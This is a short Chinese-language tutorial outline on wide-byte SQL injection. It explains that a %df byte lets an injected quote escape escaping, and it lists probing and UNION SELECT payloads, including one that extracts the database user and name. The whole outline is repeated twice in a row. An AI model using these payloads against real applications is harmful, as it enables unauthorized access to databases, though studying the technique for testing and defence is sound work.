原理
利用%df使注入语句逃逸
代码审计
黑盒测试下的宽字节注入
试探
字符型试探
?id=1%df%27%23
试探成功
注入获取敏感信息
?id=1%df%27 union select 1,2,3%23
?id=%df%27 union select 1,user(),database() %23
这里的关键要让第一个语句错误 :?id=%df%27
这里让第一个语句直接错误
原理
利用%df使注入语句逃逸
代码审计
黑盒测试下的宽字节注入
试探
字符型试探
?id=1%df%27%23
试探成功
注入获取敏感信息
?id=1%df%27 union select 1,2,3%23
?id=%df%27 union select 1,user(),database() %23
这里的关键要让第一个语句错误 :?id=%df%27
这里让第一个语句直接错误